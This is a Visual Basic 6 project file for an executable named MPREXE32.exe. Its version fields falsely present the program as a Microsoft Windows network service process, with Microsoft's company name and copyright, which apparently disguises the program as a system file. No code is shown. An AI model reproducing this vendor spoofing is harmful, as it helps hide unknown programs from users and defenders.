Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\WINDOWS\SYSTEM\STDOLE2.TLB#OLE Automation
Form=sys.frm
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="Mprexe32"
ExeName32="MPREXE32.exe"
Command32=""
Name="MPREXE32"
HelpContextID="0"
CompatibleMode="0"
MajorVer=4
MinorVer=10
RevisionVer=1998
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="WIN32 Network Interface Service Process"
VersionLegalCopyright="Copyright (C) Microsoft Corp. 1993-1998"
VersionProductName="Microsoft(R) Windows(R) Operating System"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
